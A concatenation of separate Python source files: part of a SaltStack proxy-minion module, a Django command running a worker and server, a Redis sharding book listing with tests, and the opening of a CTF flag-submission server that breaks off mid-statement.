log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
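# Illustrative pillar data expected here (proxytype and url are examples):
#   proxy:
#     proxytype: rest_sample
#     url: http://127.0.0.1:8000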
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
|
runboth.py
|
from django.core.management.base import BaseCommand, CommandError
from django.core import management
from multiprocessing import Process
from journalist.worker import Worker
class Command(BaseCommand):
help = 'This command runs the grabber and the Django server in separate processes in parallel'
def add_arguments(self, parser):
parser.add_argument('addrport', nargs='?', help='Optional parameter for specifying address and port')
def handle(self, *args, **options):
worker = Process(target=Worker().all)
worker.start()
print('Hello from main code!')
if options['addrport']:
management.call_command('runserver', options['addrport'], '--noreload', '--nothreading')
else:
management.call_command('runserver', '--noreload', '--nothreading')
# worker.terminate()
|
ch10_listing_source.py
|
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from Queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.iteritems()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, (int, long)) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
key = 'config:redis:' + component
old_config = CONFIGS.get(key, object()) #A
config = get_config( #B
config_connection, 'redis', component, wait) #B
if config != old_config: #C
REDIS_CONNECTIONS[key] = redis.Redis(**config) #C
return REDIS_CONNECTIONS.get(key) #D
# <end id="get-connection"/>
#A Fetch the old configuration, if any
#B Get the new configuration, if any
#C If the new and old configuration do not match, create a new connection
#D Return the desired connection object
#END
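# Hedged usage sketch (not part of the original listing; the component name and
# db numbers are illustrative). Writing a new JSON configuration makes the next
# call transparently rebuild the cached connection.
def _demo_get_redis_connection():
    global config_connection
    config_connection = redis.Redis(db=15)
    config_connection.set('config:redis:stats', json.dumps({'db': 0}))
    return get_redis_connection('stats')    # now a cached redis.Redis(db=0)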
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
shard = shard_key(component, 'x'+str(key), shard_count, 2) #A
return get_redis_connection(shard, wait) #B
# <end id="get-sharded-connection"/>
#A Calculate the shard id of the form: <component>:<shard>
#B Return the connection
#END
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent) #A
# <end id="no-decorator-example"/>
#A This performs the equivalent decoration, but requires repeating the 'log_recent' function name 3 times
#END
# <start id="shard-aware-decorator"/>
def sharded_connection(component, shard_count, wait=1): #A
def wrapper(function): #B
@functools.wraps(function) #C
def call(key, *args, **kwargs): #D
conn = get_sharded_connection( #E
component, key, shard_count, wait) #E
return function(conn, key, *args, **kwargs) #F
return call #G
return wrapper #H
# <end id="shard-aware-decorator"/>
#A Our decorator is going to take a component name, as well as the number of shards desired
#B We are then going to create a wrapper that will actually decorate the function
#C Copy some useful metadata from the original function to the configuration handler
#D Create the function that will calculate a shard id for keys, and set up the connection manager
#E Fetch the sharded connection
#F Actually call the function, passing the connection and existing arguments
#G Return the fully wrapped function
#H Return a function that can wrap functions that need a sharded connection
#END
# <start id="sharded-count-unique"/>
@sharded_connection('unique', 16) #A
def count_visit(conn, session_id):
today = date.today()
key = 'unique:%s'%today.isoformat()
conn2, expected = get_expected(key, today) #B
id = int(session_id.replace('-', '')[:15], 16)
if shard_sadd(conn, key, id, expected, SHARD_SIZE):
conn2.incr(key) #C
@redis_connection('unique') #D
def get_expected(conn, key, today):
'all of the same function body as before, except the last line'
return conn, EXPECTED[key] #E
# <end id="sharded-count-unique"/>
#A We are going to shard this to 16 different machines, which will automatically shard to multiple keys on each machine
#B Our changed call to get_expected()
#C Use the returned non-sharded connection to increment our unique counts
#D Use a non-sharded connection to get_expected()
#E Also return the non-sharded connection so that count_visit() can increment our unique count as necessary
#END
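# Illustrative key layout produced by the sharded counter above (the date is an
# example):
#   unique:2016-01-01:0, unique:2016-01-01:1, ...  <- sharded SETs of visitor ids
#   unique:2016-01-01                              <- non-sharded total count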
# <start id="search-with-values"/>
def search_get_values(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
count, docids, id = search_and_sort( #B
conn, query, id, ttl, sort, 0, start+num) #B
key = "kb:doc:%s"
sort = sort.lstrip('-')
pipe = conn.pipeline(False)
for docid in docids: #C
pipe.hget(key%docid, sort) #C
sort_column = pipe.execute() #C
data_pairs = zip(docids, sort_column) #D
return count, data_pairs, id #E
# <end id="search-with-values"/>
#A We need to take all of the same parameters to pass on to search_and_sort()
#B First get the results of a search and sort
#C Fetch the data that the results were sorted by
#D Pair up the document ids with the data that it was sorted by
#E Return the count, data, and cache id of the results
#END
# <start id="search-on-shards"/>
def get_shard_results(component, shards, query, ids=None, ttl=300, #A
sort="-updated", start=0, num=20, wait=1): #A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in xrange(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait)#D
c, d, i = search_get_values( #E
conn, query, ids[shard], ttl, sort, start, num) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
return count, data, ids #G
# <end id="search-on-shards"/>
#A In order to know what servers to connect to, we are going to assume that all of our shard information is kept in the standard configuration location
#B Prepare structures to hold all of our fetched data
#C Use cached results if we have any, otherwise start over
#D Get or create a connection to the desired shard
#E Fetch the search results and their sort values
#F Combine this shard's results with all of the other results
#G Return the raw results from all of the shards
#END
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in xrange(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
t.setDaemon(1)
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
try:
return Decimal(data[1] or '0') #A
except:
return Decimal('0') #A
def to_string_key(data):
return data[1] or '' #B
def search_shards(component, shards, query, ids=None, ttl=300, #C
sort="-updated", start=0, num=20, wait=1): #C
count, data, ids = get_shard_results( #D
component, shards, query, ids, ttl, sort, start, num, wait) #D
reversed = sort.startswith('-') #E
sort = sort.strip('-') #E
key = to_numeric_key #E
if sort not in ('updated', 'id', 'created'): #E
key = to_string_key #E
data.sort(key=key, reverse=reversed) #F
results = []
for docid, score in data[start:start+num]: #G
results.append(docid) #G
return count, results, ids #H
# <end id="merge-sharded-results"/>
#A We are going to use the 'Decimal' numeric type here because it transparently handles both integers and floats reasonably, defaulting to 0 if the value wasn't numeric or was missing
#B Always return a string, even if there was no value stored
#C We need to take all of the sharding and searching arguments, mostly to pass on to lower-level functions, but we use the sort and search offsets
#D Fetch the results of the unsorted sharded search
#E Prepare all of our sorting options
#F Actually sort our results based on the sort parameter
#G Fetch just the page of results that we want
#H Return the results, including the sequence of cache ids for each shard
#END
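# Hedged usage sketch (component name and shard count mirror the tests below):
#   count, docids, cache_ids = search_shards('search', 2, ['hello', 'world'])
#   # pass cache_ids back in to reuse the cached per-shard result sets:
#   count, docids, cache_ids = search_shards('search', 2, ['hello', 'world'],
#                                            ids=cache_ids)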
# <start id="zset-search-with-values"/>
def search_get_zset_values(conn, query, id=None, ttl=300, update=1, #A
vote=0, start=0, num=20, desc=True): #A
count, r, id = search_and_zsort( #B
conn, query, id, ttl, update, vote, 0, 1, desc) #B
if desc: #C
data = conn.zrevrange(id, 0, start + num - 1, withscores=True)#C
else: #C
data = conn.zrange(id, 0, start + num - 1, withscores=True) #C
return count, data, id #D
# <end id="zset-search-with-values"/>
#A We need to accept all of the standard arguments for search_and_zsort()
#B Call the underlying search_and_zsort() function to get the cached result id and total number of results
#C Fetch all of the results we need, including their scores
#D Return the count, results with scores, and the cache id
#END
# <start id="search-shards-zset"/>
def search_shards_zset(component, shards, query, ids=None, ttl=300, #A
update=1, vote=0, start=0, num=20, desc=True, wait=1):#A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in xrange(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait) #D
c, d, i = search_get_zset_values(conn, query, ids[shard], #E
ttl, update, vote, start, num, desc) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
def key(result): #G
return result[1] #G
data.sort(key=key, reverse=desc) #H
results = []
for docid, score in data[start:start+num]: #I
results.append(docid) #I
return count, results, ids #J
# <end id="search-shards-zset"/>
#A We need to take all of the sharding arguments along with all of the search arguments
#B Prepare structures for data to be returned
#C Use cached results if any, otherwise start from scratch
#D Fetch or create a connection to each shard
#E Perform the search on a shard and fetch the scores
#F Merge the results together
#G Prepare the simple sort helper to only return information about the score
#H Sort all of the results together
#I Extract the document ids from the results, removing the scores
#J Return the search results to the caller
#END
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, key): #B
return get_sharded_connection( #C
self.component, key, self.shards) #C
# <end id="sharded-api-base"/>
#A The object is initialized with the component name and number of shards
#B When an item is fetched from the object, this method is called with the item that was requested
#C Use the passed key along with the previously-known component and shards to fetch the sharded connection
#END
# <start id="sharded-api-example"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print "already followed", uid, other_uid
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now)
pipeline.zadd(fkey2, uid, now)
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange( #B
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True) #B
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True) #C
pipe.zadd(hkey, **dict(status_and_score)) #D
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)#D
pipe.execute() #E
return True
# <end id="sharded-api-example"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the recent status messages from the profile timeline of the now-followed user
#C Get a connection based on the shard key provided, and fetch a pipeline from that
#D Add the statuses to the home timeline ZSET on the shard, then trim it
#E Execute the transaction
#END
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, ids): #B
id1, id2 = map(int, ids) #C
if id2 < id1: #D
id1, id2 = id2, id1 #D
key = "%s:%s"%(id1, id2) #E
return get_sharded_connection( #F
self.component, key, self.shards) #F
# <end id="key-data-sharded-api"/>
#A The object is initialized with the component name and number of shards
#B When the pair of ids are passed as part of the dictionary lookup, this method is called
#C Unpack the pair of ids, and ensure that they are integers
#D If the second is less than the first, swap them so that the first id is less than or equal to the second
#E Construct a key based on the two ids
#F Use the computed key along with the previously-known component and shards to fetch the sharded connection
#END
_follow_user = follow_user
# <start id="sharded-api-example2"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
sharded_followers = KeyDataShardedConnection('followers', 16) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
sconn = sharded_followers[uid, other_uid] #B
if sconn.zscore(fkey1, other_uid): #C
return None
now = time.time()
spipe = sconn.pipeline(True)
spipe.zadd(fkey1, other_uid, now) #D
spipe.zadd(fkey2, uid, now) #D
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #E
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))#E
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the connection object for the uid,other_uid pair
#C Check to see if other_uid is already followed
#D Add the follower/following information to the ZSETs
#E Update the follower and following information for both users
#END
# <start id="sharded-zrangebyscore"/>
def sharded_zrangebyscore(component, shards, key, min, max, num): #A
data = []
for shard in xrange(shards):
conn = get_redis_connection("%s:%s"%(component, shard)) #B
data.extend(conn.zrangebyscore( #C
key, min, max, start=0, num=num, withscores=True)) #C
def key(pair): #D
return pair[1], pair[0] #D
data.sort(key=key) #D
return data[:num] #E
# <end id="sharded-zrangebyscore"/>
#A We need to take arguments for the component and number of shards, and we are going to limit the arguments to be passed on to only those that will ensure correct behavior in sharded situations
#B Fetch the sharded connection for the current shard
#C Get the data from Redis for this shard
#D Sort the data based on score then by member
#E Return only the number of items requested
#END
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
followers = sharded_zrangebyscore(root, #A
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)#A
to_send = defaultdict(list) #B
for follower, start in followers:
timeline = base % follower #C
shard = shard_key('timelines', #D
timeline, sharded_timelines.shards, 2) #D
to_send[shard].append(timeline) #E
for timelines in to_send.itervalues():
pipe = sharded_timelines[timelines[0]].pipeline(False) #F
for timeline in timelines:
pipe.zadd(timeline, **post) #G
pipe.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
#A Fetch the next group of followers using the sharded ZRANGEBYSCORE call
#B Prepare a structure that will group profile information on a per-shard basis
#C Calculate the key for the timeline
#D Find the shard where this timeline would go
#E Add the timeline key to the rest of the timelines on the same shard
#F Get a connection to the server for the group of timelines, and create a pipeline
#G Add the post to the timeline, and remove any posts that are too old
#END
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in xrange(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
for i in xrange(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEquals(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in xrange(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in xrange(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertEquals(total, 100)
self.assertEquals(self.conn.get(base), '100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in xrange(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEquals(r[1][0], str(i))
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEquals(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEquals(count, 50)
self.assertEquals(count, len(r))
self.assertEquals(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEquals(count, 25)
self.assertEquals(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r)[0])
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEquals(count, 25)
self.assertEquals(len(r2), 20)
self.assertEquals(r2, r[:20])
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEquals(self.conn.zcard('followers:1'), 9)
self.assertEquals(self.conn.zcard('following:1'), 9)
self.assertEquals(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in xrange(14, 10, -1):
self.assertTrue(len(redis.Redis(db=db).keys()) > 0)
for u2 in xrange(2, 11):
self.assertEquals(self.conn.zcard('followers:%i'%u2), 1)
self.assertEquals(self.conn.zcard('following:%i'%u2), 1)
self.assertEquals(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in xrange(14, 10, -1):
c = redis.Redis(db=db)
for k in c.keys():
allkeys[k] += c.zcard(k)
for k, v in allkeys.iteritems():
part, _, owner = k.partition(':')
if part in ('following', 'followers', 'home'):
self.assertEquals(v, 9 if owner == '1' else 1)
elif part == 'profile':
self.assertEquals(v, 1)
self.assertEquals(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEquals(len(sharded_zrangebyscore('timelines', 4, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
|
flags.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from classes.config.get import ConfigGet
from config.main import *
import multiprocessing
import socket
import sys
import time
import re
import pymongo
from ipaddress import IPv4Address, IPv4Network
from functions import Message
class Flags:
socket = None
def __init__(self, db):
self.db = db
self.conn = None
self.address = None
try:
self.life = CHECKER['LENGTH'] * CHECKER['ROUND_LENGTH']
self.port = CHECKER['PORT']
except KeyError:
Message.fail('Missing required CHECKER configuration values (LENGTH, ROUND_LENGTH, PORT)')
sys.exit(0)
def start(self):
Message.success('Class is initialized. Starting...\nListening on port {}'.format(CHECKER['PORT']))
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(('0.0.0.0', self.port))
self.socket.listen(CHECKER['MAX_CONNECTIONS'])  # maximum number of connections; keep this in mind when configuring the service
while True:
self.conn, self.address = self.socket.accept()
Message.info('connected:' + self.address[0])
process = multiprocessing.Process(target=self.recv, args=(self.conn, self.address))
process.daemon = True
process.start()
except KeyboardInterrupt:
print('Module flags is shutdown')
self.conn.close()
exit(0)
def recv(self, connection, address):
teams = self.db.teams.find()
# ip = IPv4Address()
print(address)
team = False
for e in teams:
if IPv4Address(address[0]) in IPv4Network(e['network']):
print(e)
team = e
break
if not bool(team):
connection.send(('Who are you?\nGoodbye\n').encode())
connection.close()
else:
try:
self.process_one_team(connection, team)
except BrokenPipeError:
print('Client is disconnected')
sys.exit(0)
def process_one_team(self, connection, team):
connection.send(('Welcome! \nYour team - ' + team["name"] + '\n').encode())
while True:
data = connection.recv(1024)
data = str(data.rstrip().decode('utf-8'))
if not re.match(r'^\w{33}=$', data):
connection.send(('this is not flag\n').encode())
continue
flag = self.db.flags.find_one({'flag': data})
if not bool(flag):
connection.send(('Flag is not found\n').encode())
continue
if flag['team']['_id'] == team['_id']:
connection.send(("It's your flag\n").encode())
continue
if (self.life + flag["timestamp"]) <= time.time():
connection.send(('This flag is too old\n').encode())
continue
status = self.db.scoreboard.find_one({
'team._id': team['_id'],
'service._id': flag['service']['_id']
})
if status["status"] != 'UP':
connection.send(('Your service '+ flag['service']['name'] +' is not working\n').encode())
continue
count_round = self.db.flags.find().sort([ ('round', pymongo.DESCENDING) ]).limit(1)[0]['round']
is_stolen = self.db.stolen_flags.find_one({
'team._id': team['_id'],
'flag._id': flag['_id']
})
if is_stolen:
connection.send(('You have already submitted this flag\n').encode())
continue
self.db.stolen_flags.insert_one({
'team': team,
'flag': flag,
'round': count_round,
